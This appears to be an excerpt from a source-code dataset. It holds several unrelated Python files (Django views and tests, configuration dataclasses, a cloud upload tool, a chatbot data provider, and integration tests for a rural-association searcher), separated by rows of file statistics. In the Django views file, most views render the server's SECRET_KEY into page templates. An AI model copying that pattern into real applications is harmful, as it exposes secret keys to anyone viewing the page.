| 46.043344 | 172 | 0.623924 | 1,851 | 14,872 | 4.819557 | 0.155592 | 0.050443 | 0.036431 | 0.04226 | 0.407578 | 0.355453 | 0.303553 | 0.255913 | 0.22901 | 0.205807 | 0 | 0.011589 | 0.257329 | 14,872 | 322 | 173 | 46.186335 | 0.796107 | 0.015533 | 0 | 0.233216 | 0 | 0 | 0.082411 | 0.004442 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060071 | false | 0.007067 | 0.038869 | 0 | 0.159011 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb235d579c9e8335bb32b2de2493cd8f2ac94ba2 | 606 | py | Python | Chessboard.py | choyai/basic-chess | 34cf581544f63b07dba4a87d7f1a3bb19a0d102e | [
"MIT"
] | null | null | null | Chessboard.py | choyai/basic-chess | 34cf581544f63b07dba4a87d7f1a3bb19a0d102e | [
"MIT"
] | null | null | null | Chessboard.py | choyai/basic-chess | 34cf581544f63b07dba4a87d7f1a3bb19a0d102e | [
"MIT"
] | null | null | null | import numpy as np
from enum import Enum
class Square:
def __init__( self, value, x, y ):
self.value = value
self.color = (x + y) % 2
self.x = x
self.y = y
def __repr__( self ):
return str(self.value) + ' ' + str((x, y))
class Chessboard:
def __init__(self):
self.squares = []
self.state = np.zeros((8, 8))
for i in range(8):
for j in range(8):
square = Square(0, i, j)
self.squares.append(square)
def __repr__(self):
return self.state.__repr__() | 22.444444 | 50 | 0.4967 | 79 | 606 | 3.556962 | 0.392405 | 0.096085 | 0.078292 | 0.120996 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016086 | 0.384488 | 606 | 27 | 51 | 22.444444 | 0.737265 | 0 | 0 | 0.1 | 0 | 0 | 0.001647 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0.1 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb238153dbf091113a90e51973cf9de922375fa2 | 1,832 | py | Python | server/main_app/views.py | impatrq/safe | e7ffd6a052304aceb4dd582df44032a29564f555 | [
"MIT"
] | 1 | 2021-07-13T23:01:56.000Z | 2021-07-13T23:01:56.000Z | server/main_app/views.py | impatrq/safe | e7ffd6a052304aceb4dd582df44032a29564f555 | [
"MIT"
] | null | null | null | server/main_app/views.py | impatrq/safe | e7ffd6a052304aceb4dd582df44032a29564f555 | [
"MIT"
] | null | null | null | import os
import json
import requests
from django.http.response import HttpResponse, JsonResponse
from django.conf import settings
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.contrib.auth import login as auth_login, logout as auth_logout
from api_tables.models import User
from api_tables.forms import WorkerForm, DoorForm
# Create your views here.
@login_required(login_url='/login/')
def index(request):
return render(request, 'index.html', {'sk': os.environ.get('SECRET_KEY')})
def login(request):
if request.method == 'POST':
request.POST = request.POST.copy()
request.POST['SECRET_KEY'] = os.environ.get("SECRET_KEY")
json_response = requests.post(settings.CURRENT_HOST + '/api/auth/login/', data=request.POST).json()
if json_response['authorized'] == 'true':
user = User.objects.get(id=json_response['user_id'])
auth_login(request, user)
return redirect('main-index')
else:
return render(request, 'login.html', {'error': json_response['error_message']})
else:
return render(request, 'login.html', {})
def logout(request):
auth_logout(request)
return redirect('main-login')
@login_required(login_url='/login/')
def workers(request):
form = WorkerForm()
return render(request, 'workers.html', {'form': form, 'sk': os.environ.get('SECRET_KEY')})
@login_required(login_url='/login/')
def doors(request):
form = DoorForm()
return render(request, 'doors.html', {'form': form, 'sk': os.environ.get('SECRET_KEY')})
@login_required(login_url='/login/')
def logs(request):
return render(request, 'logs.html', {'sk': os.environ.get('SECRET_KEY')})
def about_us(request):
return render(request, 'about-us.html', {}) | 33.925926 | 107 | 0.694869 | 240 | 1,832 | 5.183333 | 0.270833 | 0.067524 | 0.106913 | 0.072347 | 0.266077 | 0.249196 | 0.151125 | 0.151125 | 0.102894 | 0.102894 | 0 | 0 | 0.158297 | 1,832 | 54 | 108 | 33.925926 | 0.806744 | 0.012555 | 0 | 0.142857 | 0 | 0 | 0.142146 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.238095 | 0.071429 | 0.619048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bb23d6cb8be15545236f6f64ea4106fde445f291 | 1,767 | py | Python | threedi_settings/models.py | nens/threedi-settings | 578e30edd4e71b38ebc61363b3777e7036906dbc | [
"MIT"
] | null | null | null | threedi_settings/models.py | nens/threedi-settings | 578e30edd4e71b38ebc61363b3777e7036906dbc | [
"MIT"
] | null | null | null | threedi_settings/models.py | nens/threedi-settings | 578e30edd4e71b38ebc61363b3777e7036906dbc | [
"MIT"
] | null | null | null | from dataclasses import dataclass, field
from enum import Enum
from typing import List, Optional
@dataclass
class BaseConfig:
""""""
uid: str # Unique id of setting
sim_uid: str
@dataclass
class PhysicalSimulationConfig(BaseConfig):
use_advection_1d: int
use_advection_2d: int
@dataclass
class TimeStepConfig(BaseConfig):
time_step: float
min_time_step: float
max_time_step: float
use_time_step_stretch: bool
output_time_step: float
@dataclass
class NumericalConfig(BaseConfig):
cfl_strictness_factor_1d: float
cfl_strictness_factor_2d: float
convergence_cg: float
flow_direction_threshold: float
friction_shallow_water_depth_correction: int
general_numerical_threshold: float
time_integration_method: int
limiter_waterlevel_gradient_1d: int
limiter_waterlevel_gradient_2d: int
limiter_slope_crossectional_area_2d: int
limiter_slope_friction_2d: int
max_non_linear_newton_iterations: int
max_degree_gauss_seidel: int
min_friction_velocity: float
min_surface_area: float
use_preconditioner_cg: int
preissmann_slot: float
pump_implicit_ratio: float
limiter_slope_thin_water_layer: float
use_of_cg: int
use_nested_newton: bool
flooding_threshold: float
@dataclass
class AggregationConfig(BaseConfig):
flow_variable: str
method: str
interval: float
name: Optional[str] = ""
@dataclass
class SimulationConfig(BaseConfig):
physical_config: PhysicalSimulationConfig
time_step_config: TimeStepConfig
numerical_config: NumericalConfig
aggregation_config: Optional[List[AggregationConfig]] = field(
default_factory=list
)
class SourceTypes(int, Enum):
ini_file = 1
sqlite_file = 2
| 23.25 | 66 | 0.764573 | 212 | 1,767 | 6 | 0.433962 | 0.066038 | 0.040881 | 0.044025 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006944 | 0.185059 | 1,767 | 75 | 67 | 23.56 | 0.876389 | 0.011319 | 0 | 0.101695 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.050847 | 0 | 0.864407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bb25f70ffa6ee8081a8ce9f87977d0f789c35355 | 881 | py | Python | devicegroups/tests.py | svelle/Lagerregal | d0340d2fa5bbb8dfc090c23a772f46f769064ea1 | [
"BSD-3-Clause"
] | null | null | null | devicegroups/tests.py | svelle/Lagerregal | d0340d2fa5bbb8dfc090c23a772f46f769064ea1 | [
"BSD-3-Clause"
] | null | null | null | devicegroups/tests.py | svelle/Lagerregal | d0340d2fa5bbb8dfc090c23a772f46f769064ea1 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import unicode_literals
from django.test.client import Client
from django.test import TestCase
from django.urls import reverse
import six
from model_mommy import mommy
from devicegroups.models import Devicegroup
from users.models import Lageruser
class DevicegroupTests(TestCase):
def setUp(self):
self.client = Client()
Lageruser.objects.create_superuser("test", "test@test.com", "test")
self.client.login(username='test', password='test')
def test_devicegroup_creation(self):
devicegroup = mommy.make(Devicegroup)
self.assertEqual(six.text_type(devicegroup), devicegroup.name)
self.assertEqual(devicegroup.get_absolute_url(), reverse('devicegroup-detail', kwargs={'pk': devicegroup.pk}))
self.assertEqual(devicegroup.get_edit_url(), reverse('devicegroup-edit', kwargs={'pk': devicegroup.pk}))
| 35.24 | 118 | 0.746879 | 106 | 881 | 6.075472 | 0.415094 | 0.046584 | 0.043478 | 0.090062 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144154 | 881 | 24 | 119 | 36.708333 | 0.854111 | 0 | 0 | 0 | 0 | 0 | 0.07605 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.111111 | false | 0.055556 | 0.444444 | 0 | 0.611111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 3 |
bb26120df60c58054886a7da4810cc127da3d62a | 3,494 | py | Python | uai/operation/pack/base_pack_op.py | FinchZHU/uai-sdk | 78e06bebba2d18233ce6dcb5be619e940f7a7ef3 | [
"Apache-2.0"
] | 38 | 2017-04-26T04:00:09.000Z | 2022-02-10T02:51:05.000Z | uai/operation/pack/base_pack_op.py | FinchZHU/uai-sdk | 78e06bebba2d18233ce6dcb5be619e940f7a7ef3 | [
"Apache-2.0"
] | 17 | 2017-11-20T20:47:09.000Z | 2022-02-09T23:48:46.000Z | uai/operation/pack/base_pack_op.py | FinchZHU/uai-sdk | 78e06bebba2d18233ce6dcb5be619e940f7a7ef3 | [
"Apache-2.0"
] | 28 | 2017-07-08T05:23:13.000Z | 2020-08-18T03:12:27.000Z | # Copyright 2017 The UAI-SDK Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
from datetime import datetime
from uai.utils.logger import uai_logger
from ucloud.ufile import putufile
from uai.operation.base_operation import BaseUaiServiceOp
from uai.operation.tar.base_tar_op import UaiServiceTarOp
UFILE_INFO = './ufile_info.log'
CURRENT_PATH = os.getcwd()
class UaiServicePackOp(UaiServiceTarOp):
""" The Base Pack Tool Class with UAI
"""
def __init__(self, parser):
super(UaiServicePackOp, self).__init__(parser)
self.conf_params = {}
self.filelist = []
self.ufile_info = []
self.platform = ''
def _add_ufile_args(self, pack_parser):
ufile_parse = pack_parser.add_argument_group(
'Ufile-Params', 'Ufile Parameters, help to upload file to Ufile automatically'
)
ufile_parse.add_argument(
'--bucket',
type=str,
required=True,
help='the name of ufile bucket')
def _add_args(self):
super(UaiServicePackOp, self)._add_args()
self._add_account_args(self.parser)
self._add_ufile_args(self.parser)
def _parse_args(self, args):
super(UaiServicePackOp, self)._parse_args(args)
self._parse_account_args(args)
if "ai_arch_v" in args:
if self.platform != args["ai_arch_v"].lower().split('-')[0]:
raise RuntimeError("ai_arch_v should be one version of " + self.platform)
self.bucket = args['bucket']
def _upload_to_ufile(self):
public_key = self.public_key
private_key = self.private_key
bucket = self.bucket
uai_logger.debug('Start upload file to the bucket {0}'.format(bucket))
handler = putufile.PutUFile(public_key, private_key)
local_file = os.path.join(CURRENT_PATH, self.pack_file_path, self.upload_name)
local_file = local_file.replace('\\', '/')
key = self.upload_name
uai_logger.info('Upload >> key: {0}, local file: {1}'.format(key, local_file))
ret, resp = handler.putfile(bucket, key, local_file)
uai_logger.debug('Ufile response: {0}'.format(resp))
assert resp.status_code == 200, 'upload seems something error'
uai_logger.debug('upload local file :{0} to ufile key= {1} successful'.
format(local_file, key))
current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
self.ufile_info.append('Upload Time: {0}\n'.format(current_time))
self.ufile_info.append('Path of Upload File: {0}\n'.format(key))
def _pack(self):
self._upload_to_ufile()
with open(UFILE_INFO, 'w') as f:
f.write(''.join(self.ufile_info))
def cmd_run(self, args):
self._parse_args(args)
super(UaiServicePackOp, self).cmd_run(args)
self._pack()
| 38.822222 | 90 | 0.647682 | 461 | 3,494 | 4.713666 | 0.357918 | 0.033134 | 0.046019 | 0.014726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007366 | 0.222954 | 3,494 | 89 | 91 | 39.258427 | 0.793002 | 0.199485 | 0 | 0 | 0 | 0 | 0.148722 | 0 | 0 | 0 | 0 | 0 | 0.016393 | 1 | 0.114754 | false | 0 | 0.098361 | 0 | 0.229508 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb27a05966e2cdc151b7cb1b1d26243619e72b33 | 778 | py | Python | reader/migrations/0005_managers.py | FroshOU/manga | 60ec24a007a7e9ebe0c152cf1f2a2aa0362f17f2 | [
"MIT"
] | 58 | 2019-03-04T09:22:42.000Z | 2022-02-18T09:11:57.000Z | reader/migrations/0005_managers.py | FroshOU/manga | 60ec24a007a7e9ebe0c152cf1f2a2aa0362f17f2 | [
"MIT"
] | 21 | 2019-03-07T19:34:53.000Z | 2021-12-19T12:46:40.000Z | reader/migrations/0005_managers.py | FroshOU/manga | 60ec24a007a7e9ebe0c152cf1f2a2aa0362f17f2 | [
"MIT"
] | 14 | 2019-06-06T09:53:13.000Z | 2021-12-17T14:34:13.000Z | from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('reader', '0004_aliases'),
]
operations = [
migrations.AddField(
model_name='series',
name='manager',
field=models.ForeignKey(
help_text='The person who manages this series.',
blank=False, null=True, on_delete=models.SET_NULL,
to=settings.AUTH_USER_MODEL, limit_choices_to=models.Q(
('is_superuser', True),
('groups__name', 'Scanlator'),
_connector='OR'
),
),
),
]
| 29.923077 | 71 | 0.552699 | 72 | 778 | 5.75 | 0.694444 | 0.048309 | 0.077295 | 0.101449 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007843 | 0.344473 | 778 | 25 | 72 | 31.12 | 0.803922 | 0 | 0 | 0.136364 | 0 | 0 | 0.12982 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb2c5307cd59ead7a7f4bf7a140973af81e47bad | 2,099 | py | Python | mapss/static/packages/arches/arches/setup.py | MPI-MAPSS/MAPSS | 3a5c0109758801717aaa8de1125ca5e98f83d3b4 | [
"CC0-1.0"
] | null | null | null | mapss/static/packages/arches/arches/setup.py | MPI-MAPSS/MAPSS | 3a5c0109758801717aaa8de1125ca5e98f83d3b4 | [
"CC0-1.0"
] | null | null | null | mapss/static/packages/arches/arches/setup.py | MPI-MAPSS/MAPSS | 3a5c0109758801717aaa8de1125ca5e98f83d3b4 | [
"CC0-1.0"
] | null | null | null | import sys
import os
import subprocess
import shutil
import urllib.request, urllib.error, urllib.parse
import zipfile
import datetime
import platform
import tarfile
from arches import settings
here = os.path.dirname(os.path.abspath(__file__))
root_dir = os.path.dirname(here)
def install():
# CHECK PYTHON VERSION
if not sys.version_info >= (3, 7):
print("ERROR: Arches requires at least Python 3.7")
sys.exit(101)
else:
pass
return True
def unzip_file(file_name, unzip_location):
try:
# first assume you have a .tar.gz file
tar = tarfile.open(file_name, "r:gz")
tar.extractall(path=unzip_location)
tar.close()
except:
# next assume you have a .zip file
with zipfile.ZipFile(file_name, "r") as myzip:
myzip.extractall(unzip_location)
def get_version(version=None):
"Returns a PEP 440-compliant version number from VERSION."
version = get_complete_version(version)
# Now build the two parts of the version number:
# major = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|rc}N - for alpha, beta and rc releases
major = get_major_version(version)
sub = ""
if version[3] != "final":
mapping = {"alpha": "a", "beta": "b", "rc": "rc"}
sub = mapping[version[3]] + str(version[4])
return str(major + sub)
def get_major_version(version=None):
"Returns major version from VERSION."
version = get_complete_version(version)
parts = 3
major = ".".join(str(x) for x in version[:parts])
return major
def get_complete_version(version=None):
"""Returns a tuple of the django version. If version argument is non-empty,
then checks for correctness of the tuple provided.
"""
if version is None:
from arches import VERSION as version
else:
assert len(version) == 5
assert version[3] in ("alpha", "beta", "rc", "final")
return version
if __name__ == "__main__":
install()
| 25.91358 | 80 | 0.623154 | 280 | 2,099 | 4.557143 | 0.403571 | 0.087774 | 0.04232 | 0.058777 | 0.10815 | 0.067398 | 0.067398 | 0 | 0 | 0 | 0 | 0.010478 | 0.272511 | 2,099 | 80 | 81 | 26.2375 | 0.825147 | 0.218199 | 0 | 0.078431 | 0 | 0 | 0.112064 | 0 | 0 | 0 | 0 | 0 | 0.039216 | 1 | 0.098039 | false | 0.019608 | 0.215686 | 0 | 0.392157 | 0.019608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb2ca45bc470c22818c168cb989383dbf565e235 | 3,360 | py | Python | modules/dataproviders/mldataprovider.py | imdatsolak/bender | e20a5c7553d0db60440573b4fc3e907d6a8d5fad | [
"BSD-3-Clause"
] | null | null | null | modules/dataproviders/mldataprovider.py | imdatsolak/bender | e20a5c7553d0db60440573b4fc3e907d6a8d5fad | [
"BSD-3-Clause"
] | null | null | null | modules/dataproviders/mldataprovider.py | imdatsolak/bender | e20a5c7553d0db60440573b4fc3e907d6a8d5fad | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import logging
import os
from modules.mlbendermodule import MLBenderModule
"""
Class MLDataProvider as described at:
https://wiki.ml.de/pages/viewpage.action?pageId=7144585
Copyright (c) 2019 Imdat Solak
All Rights Reserved
"""
class MLDataProvider(MLBenderModule):
def __init__(self, moduleConfig, configDictionary):
super(MLDataProvider, self).__init__(configDictionary)
self.profile = {
"name" : "mldata-provider",
"class" : "data-provider",
"supported-languages" : [],
}
self.logger = logging.getLogger(os.path.basename(sys.argv[0]))
self.module_config = moduleConfig
self.variables = {
'benderversion': {
'required': [],
'optional': [],
'processor': self._getVersion,
'na-processor': self._cannot
}
}
def initForBender(self, benderInstance):
self.benderCore = benderInstance
def getProvidedVariables(self):
return self.variables
def _getVersion(self, variable, extractedValues):
return '1.1.0b'
def _cannot(self, variable):
return ''
def canProvideDataForVariable(self, variable, dataExtractors, sessionID):
varReqData = []
if variable in self.variables.keys():
varSpec = self.variables[variable]
varRequirements = varSpec['required']
for requiredVariable in varRequirements:
for extractor in dataExtractors:
# TODO: We should not look into the extractor's internal data
# structure but instead have a method for it...
if extractor.canExtractVariable(requiredVariable):
varReqData.append({'requiredVariable' : requiredVariable, 'extractor': extractor})
break
self.logger.info('Var Req Data Len {:d}, varRs {:d}'.format(len(varReqData), len(varRequirements)))
if len(varReqData) < len(varRequirements):
return False, None
else:
return True, varReqData
def cannotProvideDataMessageForVariable(self, variable, dataExtractors, sessionID):
func = self.variables[variable].get('na-processor',None)
if func is not None:
return func(variable, extractedValues)
else:
return None
def provideDataForVariable(self, variable, dataExtractors, sessionID):
canProvideData, dataExtractorSpecs = self.canProvideDataForVariable(variable, dataExtractors, sessionID)
if canProvideData:
extractedValues = {}
if dataExtractors is not None and len(dataExtractors) > 0:
for deSpec in dataExtractorSpecs:
rVar = deSpec['requiredVariable']
dE = deSpec['extractor']
value = dE.getValueForVariableInSession(rVar, sessionID)
extractedValues[rVar] = value
retval = self.variables[variable]['processor'](variable, extractedValues)
self.logger.info('Response is {}'.format(retval))
return retval, False
return None, True
| 37.333333 | 112 | 0.600893 | 292 | 3,360 | 6.869863 | 0.438356 | 0.038883 | 0.061815 | 0.052343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007729 | 0.306845 | 3,360 | 89 | 113 | 37.752809 | 0.853585 | 0.037798 | 0 | 0.029851 | 0 | 0 | 0.079542 | 0 | 0 | 0 | 0 | 0.011236 | 0 | 1 | 0.119403 | false | 0 | 0.059701 | 0.044776 | 0.328358 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb2e7d5f7c0ebcba291fff0eb900b78cfa2b84c9 | 24,753 | py | Python | tests/integration/test_krkgw_page.py | konrad-kocik/nicelka | a174fce9b8c6d4414312120e89e10bb1e10629df | [
"MIT"
] | null | null | null | tests/integration/test_krkgw_page.py | konrad-kocik/nicelka | a174fce9b8c6d4414312120e89e10bb1e10629df | [
"MIT"
] | null | null | null | tests/integration/test_krkgw_page.py | konrad-kocik/nicelka | a174fce9b8c6d4414312120e89e10bb1e10629df | [
"MIT"
] | null | null | null | from pytest import fixture
from tests.integration.utilities.utilities import get_io_dir_paths, create_dir, remove_dir, run_krkgw_searcher, assert_report_file_content_equals
test_suite = 'krkgw_page'
test_cases = ['no_result',
'no_result_twice',
'single_result',
'single_result_indirect_match_skipped',
'single_result_indirect_match_allowed',
'single_result_duplicate_skipped',
'single_result_duplicate_allowed',
'single_result_twice',
'multiple_results',
'multiple_results_indirect_matches_skipped',
'multiple_results_indirect_matches_allowed',
'multiple_results_duplicate_skipped',
'multiple_results_duplicate_allowed',
'multiple_results_twice',
'multiple_results_on_multiple_pages_all_allowed',
'multiple_results_on_multiple_pages_indirect_matches_skipped',
'multiple_results_with_empty_details',
'basic_use_cases'
]
@fixture(scope='module')
def create_reports_dirs():
for test_case in test_cases:
_, report_dir_path = get_io_dir_paths(test_suite, test_case)
create_dir(report_dir_path)
@fixture(scope='module')
def remove_reports_dirs(request):
def teardown():
for test_case in test_cases:
_, report_dir_path = get_io_dir_paths(test_suite, test_case)
remove_dir(report_dir_path)
request.addfinalizer(teardown)
def test_no_result(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'33-383 MUSZYNKA' + '\n\n' + \
'Results found: 0'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='no_result')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_no_result_twice(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'33-383 MUSZYNKA' + '\n\n' + \
'======================================================================' + '\n' + \
'33-322 JASIENNA' + '\n\n' + \
'Results found: 0'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='no_result_twice')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_single_result(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'Koło Gospodyń Wiejskich "Zezulin" w Zezulinie' + '\n' + \
'Zezulin Pierwszy 22A' + '\n' + \
'21-075 Zezulin Pierwszy' + '\n\n' + \
'Results found: 1'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='single_result')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_single_result_indirect_match_skipped(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'33-334 BOGUSZA' + '\n\n' + \
'Results found: 0'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='single_result_indirect_match_skipped')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_single_result_indirect_match_allowed(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'33-334 BOGUSZA' + '\n\n' + \
'Koło Gospodyń Wiejskich w Boguszach' + '\n' + \
'Bogusze 45' + '\n' + \
'16-100 Bogusze' + '\n\n' + \
'Results found: 1'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='single_result_indirect_match_allowed')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path, allow_indirect_matches=True)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_single_result_duplicate_skipped(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'Koło Gospodyń Wiejskich "Zezulin" w Zezulinie' + '\n' + \
'Zezulin Pierwszy 22A' + '\n' + \
'21-075 Zezulin Pierwszy' + '\n\n' + \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'Results found: 1'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='single_result_duplicate_skipped')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_single_result_duplicate_allowed(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'Koło Gospodyń Wiejskich "Zezulin" w Zezulinie' + '\n' + \
'Zezulin Pierwszy 22A' + '\n' + \
'21-075 Zezulin Pierwszy' + '\n\n' + \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'Koło Gospodyń Wiejskich "Zezulin" w Zezulinie' + '\n' + \
'Zezulin Pierwszy 22A' + '\n' + \
'21-075 Zezulin Pierwszy' + '\n\n' + \
'Results found: 2'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='single_result_duplicate_allowed')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path, allow_duplicates=True)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_single_result_twice(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'22-234 SĘKÓW' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH "BUBNOWSKIE BABY"' + '\n' + \
'Sęków 15' + '\n' + \
'22-234 Sęków' + '\n\n' + \
'======================================================================' + '\n' + \
'21-421 ZASTAWIE' + '\n\n' + \
'Koło Gospodyń Wiejskich w Zastawiu' + '\n' + \
'Zastawie 47A' + '\n' + \
'21-421 Zastawie' + '\n\n' + \
'Results found: 2'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='single_result_twice')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Koło Gospodyń Wiejskich i Gospodarzy w Kunkowej' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Koło Gospodyń Wiejskich w Kunkowej i Leszczynach' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Results found: 2'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_indirect_matches_skipped(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'33-393 MARCINKOWICE' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W MARCINKOWICACH' + '\n' + \
'Marcinkowice 124' + '\n' + \
'33-393 Marcinkowice' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W MARCINKOWICACH' + '\n' + \
'Marcinkowice 104' + '\n' + \
'33-393 Marcinkowice' + '\n\n' + \
'Koło Gospodyń Wiejskich "Marcinkowicanki"' + '\n' + \
'Marcinkowice 47' + '\n' + \
'33-273 Marcinkowice' + '\n\n' + \
'Results found: 3'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_indirect_matches_skipped')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
